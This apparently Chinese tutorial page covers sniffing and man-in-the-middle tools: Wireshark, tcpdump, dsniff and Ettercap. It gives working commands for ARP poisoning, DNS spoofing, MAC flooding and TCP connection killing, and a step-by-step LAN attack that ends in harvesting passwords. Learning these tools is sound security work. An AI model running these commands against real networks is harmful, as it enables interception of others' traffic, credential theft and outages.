响应式品牌网站设计,微信导航网站怎么做的,网站分页效果,成都开发网站建设最好的 MitM 中间人攻击开源框架清单#xff1a;https://github.com/Chan9390/Awesome-MitM
哔哩哔哩#xff1a;https://search.bilibili.com/all?keywordwireshark 1、WireShark WireShark 是一个开源免费的高性能网络协议分析软件#xff0c;它的前身就是非常著名的网络…
最好的 MitM 中间人攻击开源框架清单https://github.com/Chan9390/Awesome-MitM
哔哩哔哩https://search.bilibili.com/all?keywordwireshark 1、WireShark WireShark 是一个开源免费的高性能网络协议分析软件它的前身就是非常著名的网络分析软件Ethereal。WireShark 现在已经支持绝大多数的以太网网卡以及主流的无线网卡。
WireShark 具有如下所示的特点
(1) 支持多种操作系统平台可以运行于Windows、Linux、Mac OS X10.5.5、Solaris和FreeBSD等操作系统上;(2) 支持超过上千种的网络协议并且还会不断的增加对新协议的支持;(3) 支持实时捕捉然后可在离线状态下进行分析;(4) 支持对VOIP数据包进行分析;(5) 支持对通过IPsec、ISAKMP、Kerberos、SNMPv3、SSL/TLS、WEP 和 WPA/WPA2 等协议加密了的数据包解密;(6) 可以实时获取来自以太网、IEEE 802.11、PPP/HDLC、ATM、蓝牙、令牌环和FDDI(光纤)等网络中的数据包;(7) 支持读取和分析许多其它网络嗅探软件保存的文件格式包括 Tcpdump、Sniffer pro、EtherPeek、Microsoft Network Monitor和CISCO Secure IDS 等软件;(8) 支持以各种过滤条件进行捕捉支持通过设置显示过滤来显示指定的内容并能以不同的颜色来显示过滤后的报文;(9) 具有网络报文数据统计功能;(10) 可以将它捕捉到的数据导出为XML、PostScript、CSV及普通文本文件的格式。
WireShark 官网https://www.wireshark.org
WireShark 要在 Windows系统下运行时还需要一个名为 Winpcap 的驱动库但是现在 Wireshark 底层用的是 Npcap Npcap 是 神器Nmap 套件中一个Windows数据抓包程序主要用于Windows数据包嗅探和发送。Npcap 开源项目源于2013年由Nmap创始人Gordon Lyon和北京大学罗杨博士发起并由Google Summer of Code计划赞助以MIT协议发布。由于Winpcap 已经停止更新此前版本的Npcap主要基于Winpcap2013停更Npcap 通过底层开发构建了全新自己的 Npcap 原始数据包捕获/发送驱动程序在兼容WinpcapAPI 的基础上使用更加现代 API 接口在功能、性能、安全性方面都完胜老版本。如果是在 Linux 系统下使用时就应当使用 Libpcap 驱动库它现在的版本是 Libpcap1.0.0我们可以从 www.tcpdump.org 上下载。
WireShark 在 Windows 和 Linux 系统下安装之前首先你得保证系统上已经安装了 Npcap 或 Linpcap。下图就是 WireShark 在 Windows 系统下运行时的主界面。 选一个要抓取数据包的网卡接口就可以捕获接口上的数据 IP 过滤
在过滤器中输入 ip. 可以查看其它选项。 源 IP ip.src 192.168.0.5 或 ip.src eq 192.168.0.5 目的IPip.dst 192.168.0.5 或 ip.dst eq 192.168.0.5 指定主机ip源或目的: ip.host 192.168.0.5 或 ip.host eq 192.168.0.5 或者用ip.addr 指定源ip 或 指定目的ip: ip.src 192.168.0.5 or ip.dst 192.168.0.5 指定源ip 且 指定目的ip: ip.src 127.0.0.1 and ip.dst 192.168.0.5 IP层还可以跟进 IP 协议的字段 过滤。 MAC 地址 过滤 与 ip.过滤类似使用 eth.XXX没有eth.host 示例eth.addreth.srceth.dst 端口 过滤 端口过滤非常常用要指明协议是tcp还是udp 可以用srcportdstportport端口可以用比较符合eq 示例过滤目的端口是80端口的tcp报文tcp.dstport 80 示例过滤源端口是443的tcp报文tcp.srcport 443 示例过滤端口是80的tcp报文 或者端口是53的udp报文udp.port 53 or tcp.port 80 示例过滤源端口号大于1024的tcp报文tcp.srcport 1024 示例过滤指定服务器80端口 tcp.port 80 and ip.host 192.168.0.5 协议 过滤 tcpudparpicmphttpsmtpftpdnsmsnmsipssloicqbootp等。 排除 就是在前面加个 ! 或者 not。 示例只显示tcp报文 tcp 示例只显示不是 tcp 的报文 !tcp 或者 not tcp 示例过滤ack的包tcp.ack 1 示例过滤http包以及dns包以及ssl包http or dns or ssl http 过滤 http.request.method GET 过滤 HTTP 的 GET 请求 http.request.method POST 过滤 HTTP 的 POST 请求 http.response.code 200 使用 contains 过滤内容 http contains HTTP/1.1 200 OK http contains 200 OK http contains admin tcp contains admin 过滤包的指定的字段协议 [开始位置长度] 示例tcp协议从第2个字符开始(起始是0不是1这个2是偏移的位置) 长度为3内容为01bbeb tcp[2:3] 01:bb:eb 正则 过滤 正则使用的是 matches 格式 tcp matches 正则表达式 // tcp contains 字符串 // contains 只是进行 字符串匹配 流 追踪 数据包点击鼠标右键 --- 追踪流 --- tcp 流进行跟踪、或者 http 流 点击之后就会看到这条 tcp流 或者 http流 上的所有请求和回复 选择不同的协议就可以查看对应协议的流 配置 Wireshark 抓取 https 数据包 解密SSL
Wireshark 解密 HTTPS 流量的两种方法http://cn-sec.com/archives/508478.html
Wireshark 的抓包原理是直接读取并分析网卡数据要想让它解密 HTTPS 流量有两个办法
方法 1
如果你拥有 HTTPS 网站的加密私钥可以用来解密这个网站的加密流量
方法 2
某些浏览器支持将 TLS 会话中使用的对称密钥保存在外部文件中Wireshark 可以利用这个文件进行解密。Firefox 和 Chrome 都支持这种方式但 Firefox 和 Chrome 只会在系统环境变量中存在 SSLKEYLOGFILE 路径时才会生成该文件先来加上这个环境变量 以 Windows为例
1、配置环境变量 SSLKEYLOGFILE 值为 C:\ssl_key\sslog.log注意后缀名一定用 log这样浏览器和服务器SSL协商的秘钥信息会存储到文件中。打开浏览器访问一个HTTPS 网页然后打开 SSLKEYLOGFILE 环境变量值的文件路径就可以看到TLS协商的随机字符串记录。2、配置 Wireshark 设置文件路径。菜单栏 --- 编辑 --- 首选项 --- Protocols --- SSL( 有的版本只有 TLS ) --- Pre-Master-Securet log filename(预主密钥) 添加 SSLKEYLOGFILE 变量设置的路径的日志文件。3、配置好后重启浏览器为了避免 wireshark 抓到其他数据包可以添加过滤器条件设置 tcp.port443 这样就只过滤 https 的数据包。2、Tcpdump 和 Windump Tcpdump 官网http://www.tcpdump.org/
Tcpdump 是一个基于命令行工作在被动模式下的网络嗅探器。可以很好地运行在 UNIX、Linux 和 MacOS 操作系统上可以从官网上下载它的二进制包。同时要运行它也需要系统中安装有 Libpcap1.0.0 这个驱动库。Tcpdump 在 Windows 系统下的版本就是 Windump 也是一个免费的基于命令行方 式的网络分析软件。在使用 Windump 之前同样要确保系统中已经安装有 WinPcap 4.0.2 驱动库。
许多网络或安全专家都喜欢用它来发现网络中是否存在ARP地址欺骗。可以将它捕获到的数据包先写入到一个文件当中然后用 WireShark 等有图形界面的嗅探器读取和分析。
命令格式为tcpdump [ -adeflnNOpqStvx ] [ -c 数量 ] [ -F 文件名 ][ -i 网络接口 ] [ -r 文件名] [ -s snaplen] [ -T 类型 ] [ -w 文件名 ] [表达式 ]
-i 指定要捕捉的网络接口卡-r 读取已经存在的捕捉文件-w 将捕捉到的数据写入到一个文件中。man tcpdump 或者 tcpdump --help 查看更多参数
Tcpdump 使用以下三种类型的关键字
(1)、表示类型的关键字主要有 Host、Net、Port Host指定主机的IP地址 ( 如果没有指定关键字缺省是 Host 类型 ) Net指定网络地址 Port指定端口表示传输方向的关键字主要有 Src、Dst src源IP地址 dst目的IP地址(3)、表示协议的关键字主要有 iparptcpudp 等。
Tcpdump 的关键字还有很多查看帮助文档来得到它们的详细说明。
关键字之间可以使用 逻辑运算关键字 连接以便于指定某个范围或排除某个主机等。
逻辑运算关键字 有三个
取非 运算 not或者用 ! 表示与 运算 and或者用 表示或 运算 or 或者用 || 表示3、 DSniff 工具包 github 地址https://github.com/search?qdsniff
Kali 需要安装apt install dsniff
Dsniff 是一个著名的综合性网络嗅探、口令嗅探工具包。Dsniff 开发者 DugSong 在1999年12月以密歇根大学 CITI 研究室 CenterforInformationTechnologyIntegration的研究成果为基础 开发了这个后来具有很大影响力的网络安全工具包。Dsniff 的下载网址https://monkey.org/~dugsong/dsniff/ 。也可以从网上找到 Dsniff 早期支持的 windows 版本。
DSniff 可以使用一系列的主动攻击方法将网络流量重新定向到网络嗅探器主机使得网络嗅探器有机会捕获到网络中某台主机或整个网络的流量。这样就可以将 DSniff 用在交换或路由的网络环境中以及 Cable modem 拔号上网的环境中使用。甚至当安装有 DSniff 的网络嗅探器不直接连接到目标网络当中它依然可以通过运程的方式捕获到目标网络中的网络报文。
Dsniff 是一个工具集主要分为四类
纯粹被动地进行网络活动监视的工具包括dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy;针对 SSH 和 SSL 的 MITMMan-In-The-Middle攻击工具包括 sshmitm 和 webmitm;发起主动欺骗的工具包括arpspoof、dnsspoof、macof;其它工具包括 tcpkill、tcpnice
各个工具说明
dsniff一个密码侦测工具他能够自动分析端口上收到的某些协议的数据包并获取相应的密码。dnisff 支持的协议有 FTP、Telnet、SMTP、HTTP、POP、poppass、NNTP、IMAP、SNMP、LDAP、Rlogin、RIP、OSPF、PPTP MS-CHAP、NFS、VRRP、YP/NIS、SOCKS、X11、CVS、IRC、AIM、ICQ、Napster、PostgreSQL、Meeting Maker、Citrix ICA、Symantec pcAnywhere、NAI Sniffer、Microsoft SMB、Oracle SQL*Net、Sybase and Microsoft SQL 等filesnart嗅探网络文件系统NFS的流量SMB方式传输的文件的一个副本并选定某个文件转储到本地当前工作目录。mailsnarf嗅探 SMTP 和 POP 流量并以 Berkeley 邮件格式输出 e-mail 消息。msgsnarf嗅探聊天软件的聊天内容包括AOL、ICQ 2000、IRC、MSN Messenger 或 Yahoo Messengerurlsnarf嗅探 HTTP 请求报文的内容并以CLF (Common Log Format格式输出。webspy指定一个要嗅探的主机如果指定主机发送HTTP请求打开网页webspy也会通过 netscape 浏览器在本地打开一个相同的网页。( 它能将从客户处嗅探到的URL地址发送到攻击者的WEB浏览器中显示。并且实时更新攻击者就可以看到你到底浏览了哪些网站 )sshmitm 是Dsniff自带的一个具有威胁的工具之一。首先通过dnsspoof伪造实际机器主机名将攻击目标主机的SSH连接转到本地那么sshmitm可以截获来自主机的密钥并获得被劫持连接中的所有信息解码然后重新转发SSH流量到SSH服务器;webmitm与 sshmitm 类似也需要 dnsspoof 的配合不同的是webmitm劫持的是HTTP和HTTPS会话过程捕获SSL的加密通信;arpspoof启用 arp 欺骗将自己网卡的IP地址伪装成指定 IP 地址的MAC例如伪装成网关嗅探局域网的所有网络流量进行抓包;dnsspoof启用DNS欺骗如果dnsspoof嗅探到局域网内有DNS请求数据包它会分析其内容并用伪造的DNS响应包来回复请求者。如果是 请求解析某个域名dnsspoof会让该域名重新指向另一个IP地址黑客所控制的主机如果是反向IP指针解析dnsspoof也会返回一个伪造的域名。一个非常重要的功能就是 webmitm这种功能主要是用来捕获SSL和SSH加密了的数据。macof使用 MAC flooding 来攻击交换机。通过不断向交换机发送包含有冒充的MAC地址的数据包以此来溢出交换机的MAC地址表。此时交换就会以广播的方式发送所接收到的数据包。它一般在上述嗅探软件前使用;tcpkill能够切断指定的TCP会话连接主要是基于TCP的三次握手过程。其实就是一种拒绝服务攻击(DoS)。主要用来切断与合法主机的网络连接保证嗅探工作的正常进行。它一般在上述嗅探软件前使用。tcpnice能够通过在添加活动的流量降低指定的LAN上的TCP连接的速度。screenspy 用进行屏幕监控;dsniff 用法 dsniff [-c] [-d] [-m] [-n] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]]] [-r|-w savefile] [expression] 选项 -c 打开半双工TCP流允许在使用 arpspoof时进行正确的嗅探操作 -d 启动调试模式; -m 使用dsniff.magic文件通过在magic文件中定义的特征尝试自动判断协议 -n 不把 IP 地址解析成主机名 -i interface 指定网络接口 -p pcapfile 不是处理网络上所观察到的数据包的内容而是处理给定捕获数据包的PCAP文件。 -s snaplen 对报文的前snaplen个字节进行嗅探而不是默认的1024字节;. -f services 以/etc/service格式从文件中加载触发器(也就是口令嗅探的服务类型); -t trigger[,...] 使用格式 port/protoservice 来加载一个以逗号界定的触发器集(e.g. 80/tcphttp). dsniff –t 21/tcpftp,23/tcptelnet –m -r savefile 从保存的文件中读取会话(-w 选项 可以保存会话到文件) -w file 保存 会话 到文件中 expression 指定一个 tcpdump(8) filter expression 来让 sniff 选择要嗅探的流量. 在挂起的信号中dsniff会将当前的触发器表转储到dsniff.services。 FILES /usr/share/dsniff/dsniff.services Default trigger table /usr/share/dsniff/dsniff.magic Network protocol magic 参见另请参阅 arpspoof(8), libnids(3), services(5), magic(5) filesnarf、mailsnarf、msgsnarf、urlsnarf、webspy、webspy
filesnarf、mailsnarf、msgsnarf、urlsnarf、webspy、webspy 使用方式都 差不多。可以 使用 man 查看具体使用。 FILESNARF(8) System Managers Manual FILESNARF(8) NAME filesnarf - sniff files from NFS traffic SYNOPSIS filesnarf [-i interface | -p pcapfile] [[-v] pattern [expression]] DESCRIPTION filesnarf saves files sniffed from NFS traffic in the current working directory. OPTIONS -i interface 指定监听接口 -p pcapfile 处理捕获的 包文件 -v 反转 模式. 反转匹配选中不匹配的文件. pattern 指定正则表达式 expression 指定 一个要嗅探的流量的 tcpdump(8) 过滤表达式 SEE ALSO dsniff(8), nfsd(8) sshmitm、webmitm
webmitm 与 sshmitm 类似都需要配合 dnsspoof 一块使用。
webmitm 劫持的是 HTTP 和 HTTPS 会话过程sshmitm 捕获 SSL 的加密通信arpspoof
arp 毒化的原理简单的说就是伪造MAC地址与IP的对应关系导致数据包由中间人转发出去。
中间人攻击 --- ARP毒化http://www.2cto.com/Article/201207/144532.html
arp 毒化有双向remote和单向oneway两种方式。
双向方式将对两个目标的ARP缓存都进行毒化对两者之间的通信进行监听。一般来说会选择使用双向欺骗的方式来获取所有的数据包进行嗅探分析。单向方式只监听从第一个目标到第二个目标的单向通信内容。
若目标主机开启了ARP防火墙怎么办
直接欺骗会引发报警且无效果。这时就是单向ARP毒化大显神威的时候了。只要路由器没有对 IP 和 MAC 进行绑定我们就可以只欺骗路由器使从路由器发给目标主机的数据包经过中间人完成我们的攻击。如果不指定 tagget 则向网络中所有的主机发送欺骗 rootkali:~# arpspoof -h Version: 2.4 用法: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host 名字 arpspoof - 在交换式网络截获包 概要 arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host 描述 通过伪造 ARP 响应,重定向局域网中一个目标主机(或所有主机)上的数据包 到 局域网中的另一个主机上。这在交换式网络上嗅探流量是一个非常有效的方法 注意内核IP转发(或一个实现相同功能的用户程序如 fragrouter(8))必须提前打开。 选项 -i 网卡接口 指定使用的网卡接口 -c own|host|both 指定在恢复arp配置时使用的硬件地址;在清理时可以用自己的地址和主机的地址发送数据包。 用一个假的硬件地址发送数据包可能会破坏与某些switch/ap/bridge 配置的连接 但是它比使用自己的地址更可靠这是arpspoof事后清理的默认方式。 -t target 指定要 ARP毒化 的主机(如果没有指定默认局域网所有主机). 可以重复指定多个主机。 -r 毒化两个主机(主机和目标)以捕获两个方向的流量。(只在与 -t 联合使用才有效) host 指定你希望拦截数据包的主机(通常是本地网关)。 参见另请参阅 dsniff(8), fragrouter(8) // 使用ARP毒化重定向受害者的流量传送给攻击者。 rootbt:~# arpspoof -i eth0 -t 192.168.1.5 192.168.1.1 // 第二个ARP毒化攻击使网关的数据重定向到攻击者的机器(流量由网关到攻击者再到受攻击者) rootbt:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.2 rootbt:~# arpspoof -i eth0 -t 192.168.1.5 192.168.1.1 rootbt:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.5 arpspoof 启用 arp 欺骗将自己网卡的IP地址伪装成指定IP地址的MAC持续不断的发送假的ARP响应包给一台或多台主机以 毒害 其ARP缓存表。一旦成功即可以用别的嗅探工具来接收发送到本地的数据包。
与 Ettercap 不同的是 arpspoof 并不进行真正的嗅探它只是简单的进行ARP欺骗本地主机 必须启动内核的 IP Forwarding功能或者使用 fragrouter 这样的工具否则所有 转向 发到本地的数据包就如同进了黑洞 正常的网络通信将无法进行 而一旦启动了本地的 IP Forwarding内核将自动对本地收到的目的IP却是别处的数据包进行转发正常的通信自然可以进行。这样就可以进行后续的工作包括分析嗅 探得到的数据包、修改数据包中的某些信息以重新转发等等。
Ettercap 则不光进行 ARP 欺骗它还要做后续的许多工作包括分析嗅探得到的数据包、修改数据包中的某些信息以重新转发等等。
Linux 中缺省是禁止 IP Forwarding 的输入下面命令启用 IP 转发 PS: 利用 Linux 主机的路由功能 rootbt:~# cat /proc/sys/net/ipv4/ip_forward rootbt:~# echo 1 /proc/sys/net/ipv4/ip_forward rootbt:~# cat /proc/sys/net/ipv4/ip_forward 或者 修改下面文件 修改 # vi /etc/sysctl.conf 修改 net.ipv4.ip_forward1 修改后运行 #sysctl –p 命令使得内核改变立即生效 一旦启动了本地的 IP Forwarding内核将自动对本地收到的目的IP是别处的数据包进行转发 ( 同时向数据包的源地址发送ICMP重定向报文 当然 由于启用了ARP欺骗 这个重定向报文是不起作用的)。 arpspoof 实现局域网欺骗、中间人攻击
在现代的局域网当中交换式局域网是主流广播式的局域网已经或者不在存在以前要嗅探局域网络上传输的信息只需将网卡设置为混合模式通过捕获数据包的软件就可以截取。现在交换式以太网或者局域网中交换机通过查看路由表不严格的说法发送信息。要想截获两台主机中传递的信息可以通过 arp 欺骗获得。
中间人攻击中间人攻击是一种“间接”的入侵攻击这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间这台计算机就称为“中间人”ARP 协议ARP协议准确的来说是ARP地址解析协议。ARP是指根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机并接收返回消息以此确定目标的物理地址收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间下次请求时直接查询ARP缓存以节约资源。通俗的说DNS是域名与IP对应的协议而ARP是IP与mac(物理地址)对应的协议DNS常用于主机与外网机器连接时进行地址转换而ARP多用于内网机器通信时地址的转换ARP 欺骗ARP欺骗就是通过欺骗局域网内访问者PC的网关MAC地址使访问者PC错以为攻击者更改后的MAC地址是网关的MAC导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可以嗅探、篡改数据包且可让网络上特定计算机或所有计算机无法正常连线。
步骤
第一步查看IP和网关命令 ifconfig route -n ( 我本机网关192.168.1.1 )第二步利用 nmap 查看同网段下192.168.1.0/24的所有活跃IP使用命令 nmap 192.169.1.0/24。确认被攻击机的IP地址。( 假设被攻击主机 IP 是 192.168.1.5 )第三步让被攻击的主机断网arpspoof -i eth0 -t 192.168.1.5 192.168.1.1第四步断网不是我们的目的我们的目的是实施ARP欺骗和中间人攻击。开启 IP 转发功能linux 因为系统安全考虑是不支持 IP 转发的其配置文件写在 /proc/sys/net/ipv4 的ip_forward中。默认为0修改为1 ( 命令echo 1 /proc/sys/net/ipv4/ip_forward )就可以嗅探目标靶子的流量来获取目标的重要信息。欺骗成功使用 ettercap 渗透工具来抓取账号密码执行命令 ettercap -Tq -i eth0 监控 eth0 网卡的流量dnsspoof rootkali:~# dnsspoof -h Version: 2.4 用法: dnsspoof [-i interface] [-f hostsfile] [expression] 描述 dnsspoof启用DNS欺骗如果dnsspoof嗅探到局域网内有DNS请求数据包 它会分析其内容并用伪造的DNS响应包来回复请求者。 如果是请求解析某个域名dnsspoof会让域名重新指向另一个IP地址(黑客所控制的主机) 如果反向IP指针解析也会返回一个伪造的域名. 在dnsspoof的命令选项中可以指定一个主机列表文件文件格式与/etc/hosts相同 如果不指定该文件dnsspoof会返回本地的IP给域名解析请求者。 选项 -i interface 指定使用的网卡 -f hostsfile 指定要欺骗的网址。如果不指定hostsfile将返回本机的IP地址给攻击者 expression 指定一个tcpdump(8)过滤器表达式来选择要嗅探的流量。就是指定一个Tcpdump准则 的 包过滤 文件 /usr/share/dsniff/dnsspoof.hosts Sample hosts file. 参见另请参阅 dsniff(8), hosts(5) // man 8 dsniff 或者 man 5 hosts rootbt:#dnsspoof -i eth0 -f /usr/h22.hosts
dnsspoof [-i interface] [-f hostsfile] [expression] 这里-f 可以指定主机列表文件文件格式与/usr/local/lib/dnsspoof.hosts相同如果不指定该文件dnsspoof会返回本地的 IP给域名解析请求者 这里本地主机会抢先代替DNS服务器来相应查询前提是本地主机先回答DNS查询如果因为 网络问题DNS服务器先发送了应答DNS欺骗就不能生效了 macof
macof 用来进行 MAC flooding在本地网络中发送大量的随机 MAC 地址的数据包可以指定源IP、目的IP、源端口、目的端口以MAC洪水的方式来导致某些交换机 MAC 表溢出从而丧失 交换 能力 对于以后收到的数据包以广播方式发送以达到共享式嗅探的目的。注意在进行 MAC 泛洪之前就存在于交换机 MAC 表中的条目不会被覆盖只能等到这些条目自然老化。 NAME macof - 用随机 MAC 地址 洪泛 交换式局域网络 用法 macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times] 选项 -i interface 指定发送的网卡接口 -s src 指定源 IP 地址 -d dst 指定目的 IP 地址 -e tha 指定目标硬件地址 -x sport 指定 TCP 源端口 -y dport 指定 TCP 目的端口 -n times 指定发送包 的 个数 任何未指定的选项的值都是随机生成的。 参见另请参阅 dsniff(8) tcpkill
tcpkill 能够切断指定的 TCP 会话连接主要是基于 TCP 的三次握手过程。 中断特定的 TCP 连接。 rootkali:~# tcpkill -h Version: 2.4 Usage: tcpkill [-i interface] [-1..9] expression NAME tcpkill - kill TCP connections on a LAN 选项 -i interface 指定监听接口 -1...9 指定在杀死连接时使用的蛮力的程度。 为了在移动的接收窗口中找到一个RST快速连接可能需要一个更高的数字。默认是3。 expression 指定一个tcpdump(8)过滤器表达式来选择要杀死的连接 SEE ALSO dsniff(8), tcpnice(8) 这里当tcpkill检测到两边的TCP连接后会同时想两边冒充对方发送tcp reset报文重置连接。 tcpnice
tcpnice 能够通过在添加活动的流量降低指定的 LAN 上的 TCP 连接的速度
tcpnice [-I] [-iinterface] [-nincrement] expression 这里的-n后面可以跟1-20代表降低的速度1为原速20为最低 4、 Ettercap ( kali 自带工具 ) 官网https://www.ettercap-project.org/index.html
github 地址https://github.com/Ettercap/ettercap
ettercap 是一个高级网络嗅探软件有人性化的图形化界面又有丰富的命令还可以编写过滤规则。Ettercap 能够对大多数的网络协议数据包进行解码不论这个数据包是不是加密的。Ettercap 还拥有一些独特的方法用来捕获主机或整个网络的流量并对这些流量进行相应的分析。Ettercap 可以在交换机的网络环境中使用。Ettercap 的大部分特性与 DSniff 相似可以在命令行模式下使用也可以在图形界面上使用。
Ettercap 支持四种界面模式分别是Text、Curses、GTK2 、Daemonize。
-T 参数即 Text 界面模式相当于命令行通常与之配套的参数有 -q 代表安静模式表示不会显示抓到数据包的内容。-C ( Curses ) 和 -G ( GTK2 ) 参数图形化界面带有 GUI。-D 参数Daemonize 也叫做守护模式可以理解为在后台运行。
-G 参数指定在 GTK2 接口的图形模式下使用。 是在 kali 用户下不是 root 用户下执行时必须 sudo不然会有权限问题 在 Ettercap 使用中还存在关于交互模式的问题如果启动 Ettercap 的时候没有指定参数 -N 选项那么就默认自动选择了交互模式。如果在某些情况下不知到可以做什么只要键入 H 就可以弹出帮助画面可看到可执行命令的消息列表。 另外 Ettercap 并不转发数据包转发数据包的是操作系统因此在中间人攻击时需要启用操作系统的数据包转发功能。当然如果只想用 Ettercap 做一个中间人而用其他工具来嗅探数据的话可以加入参数-o (only-mitm)实现。
ettercap --help 命令查看帮助 Ettercap 两种运行方式UNIFIED 和 BRIDGED
UNIFIED 方式是以中间人方式嗅探。原理UNIFIED方式是同时欺骗A和B把原本要发给对方的数据包发送到第三者C上然后由C再转发给目标。这样C就充当了一个中间人的角色。因为数据包会通过C那里所以C可以对数据包进行分析处理导致了原本只属于A和B的信息泄露给了C。UNIFIED方式可以完成以上欺骗并对数据包分析。Ettercap 劫持的是A和B之间的通信在 Ettercap 眼中A和B的关系是对等的。BRIDGED方式是在双网卡情况下嗅探两块网卡之间的数据包。原理BRIDGED方式 有点像笔记本电脑上有两个网卡一个有线网卡一个无线网卡。可以将有线网卡的 internet 连接共享给无线网卡这样笔记本就变成了一个无线 ap无线网卡产生的所有数据流量都将传送给有线网卡。BRIDGED方式 ettercap 嗅探的就是这两块网卡之间的数据包。
一般使用 UNIFIED 方式。其运行参数为 -MM是MITM的首字母为中间人攻击的缩写。当指定 -M 参数时即中间人攻击时有以下几种攻击方式
arp 毒化的中间人攻击。arp毒化的原理简单的说就是伪造MAC地址与IP的对应关系导致数据包由中间人转手出去arp 毒化有 双向remote和 单向oneway两种方式。 双向方式将对两个目标的ARP缓存都进行毒化对两者之间的通信进行监听。 单向方式只会监听从第一个目标到第二个目标的单向通信内容。 一般选择双向欺骗的方式来获取所有的数据包进行嗅探分析。 例如ettercap -T -q -M arp:remote /10.0.0.2/ // 说明对 10.0.0.2 的所有端口的通信进行嗅探包括发出的数据包和收到的数据包。 Port Stealing此攻击方式适用的环境是在交换机下且路由器中ip和mac绑定无法进行arp欺骗。其基本思想是既然无法欺骗路由器的IP和MAC对应关系那么就欺骗交换机的吧。这样原本应该通过交换机某一个端口到达目标主机的数据包被传入了攻击者的端口。由于本方法只能用于交换机环境且会产生大量的数据包严重影响网络状况用之前须三思。Ettercap它相当于ARP病毒和密码嗅探界的瑞士军刀。 -T 使用 文字 界面 -q 安静模式减少不必要输出 -M MITM中间人方式下面示例中是 中间人是ARP 如果我们的目标是网络上的所有主机想要嗅探每个节点之间的所有传输 命令 ettercap -T -q -M ARP // // 你应当谨慎的使用上面那段命令因为如果把一个大网络中所有的传输都通过一台很慢的计算机的话那么这很有可能使整个网络连接瘫痪。可以找个替罪羊来看看 IP 地址为 192.168.1.1 的主机 命令ettercap -T -q -M ARP /192.168.1.1/ // 如果192.168.1.1 是网关我们应该可以看到所有的输出传输。 对于 Ettercap 的 sniffing 工作方式可以划分为五种
1IPBASED在基于IP地址的sniffing方式下Ettercap将根据源IP-PORT和目的IP-PORT来捕获数据包2MACBASED在基于MAC地址的方式下Ettercap将根据源MAC和目的MAC来捕获数据包在捕获通过网关的数据包时这种方式很有用3ARPBASED在基于 Arp 欺骗的方式下Ettercap利用Arp欺骗在交换局域网内监听两个主机之间的通信全双工4SMARTARP在SMARTARP方式下Ettercap利用Arp欺骗监听交换网上某台主机与所有已知的其他主机存在于主机表中的主机之间的通信全双工5PUBLICARP在PUBLICARP 方式下Ettercap利用Arp欺骗监听交换网上某台主机与所有其它主机之间的通信半双工。此方式以广播方式发送Arp响应但是如果 Ettercap已经拥有了完整的主机地址表或在Ettercap启动时已经对LAN上的主机进行了扫描Ettercap会自动选取 SMARTARP方式而且Arp响应会发送给被监听主机之外的所有主机以避免在Windows主机上出现IP地址冲突的消息。Ettercap 目标写法MAC / IPs / PORTs
对于 Ettercap 的常用操作在选择目标时Ettercap 的目标表达形式为 MAC / IPs / PORTs
依照这个规则可以精确到特定的目标主机和端口上MAC、IP、PORT 为三个条件为空代表ANY即所有。Ettercap 针对三个条件同时成立的目标进行嗅探。 示例//80 表示 任意MAC、任意IP上的80端口 进行嗅探。 一般 MAC 部分可以留空因此可以只用 IP 部分来确定目标主机。 当 目标有 多个 IP 或者 多个端口 时 可用 逗号 来分隔不同的 C 段 IP可以用 - 表示连续的 IP可以用 分号 分隔不同表达形式的 IP示例10.0.0.1-5;10.0.1.33 表示 IP地址 10.0.0.12345 和 10.0.1.33。 示例20-25, 80, 110 表示 端口号 20212223242580 和110。 示例常用操作写法 arp 毒化 eth0 所在的网段安静模式、文本显示命令ettercap -Tqi eth0 -M ARP // // 监听 10.0.0.1 的 ftpsshtelnet 信息并保存到本地命令ettercap -Tzq /10.0.0.1/21,22,23 -w hack.pcap 对 192.168.1.120 进行 dns 欺骗使用默认网卡 eth0文本模式、安静显示 命令ettercap -Tq -P dns_spoof -M arp /192.168.1.120/ // 使用过滤并监听 10.0.0.2 在 80 端口的所有通信安静模式、文本显示保存数据到本地 命令ettercap -Tqi eth0 -L sniffed_data -F filter.ef -M arp:remote /10.0.0.2/80 // 控制台模式下-T不使用混杂模式-p只显示自己的通信。命令ettercap -Tp 只嗅探本机110端口pop3的信息。命令ettercap -Tzq //110 在控制台模式下(-T)不使用 ARP 初始化-z不显示数据包内容(-q安静模式)显示捕捉到的用户名、密码以及其他消息。命令ettercap -Tzq 只嗅探本机与192.168.0.11主机在端口21、22、23上的通信。 命令ettercap -Tzq /192.168.0.11/21,22,23 在控制台模式下-T加载主机列表-j对目标执行arp毒化中间人攻击-M arp命令ettercap -T -j /tmp/victims -M arp /10.0.0.1-7/ /10.0.0.10-20/ 控制台下对整个局域网执行ARP毒化攻击-M arp。命令ettercap -T -M arp // // 在控制台模式下-T执行 ARP 双向欺骗-M arp:remote嗅探网关 192.168.1.1 与 部分主机 192.168.1.2-10 之间相互通信的数据包。命令ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/ 在控制台模式下-T不使用 ARP初始化-z使用安静模式-q监听所有主机110端口pop3协议端口。命令ettercap -Tzq //110 在控制台模式下-T不进行ARP初始化-z使用安静模式-q监听目标10.0.0.1的212223端口FTP、SSH、TELNET命令ettercap -Tzq /10.0.0.1/21,22,23 打印输出可用插件列表。命令ettercap -P list 在 eth0 网卡上用自己的 filter 嗅探 ip 为 192.168.0.11 主机在 80 端口上的所有通信并把所有的数据包保存成文件名为 sniffed_data 的文件。命令ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /192.168.0.11/80 // 单向欺骗路由只劫持路由发向 10.1.1.2 的数据包。命令ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.1/ /10.1.1.2/ ettercap filter 的写法
一个好工具配一个好的过滤规则才是perfect
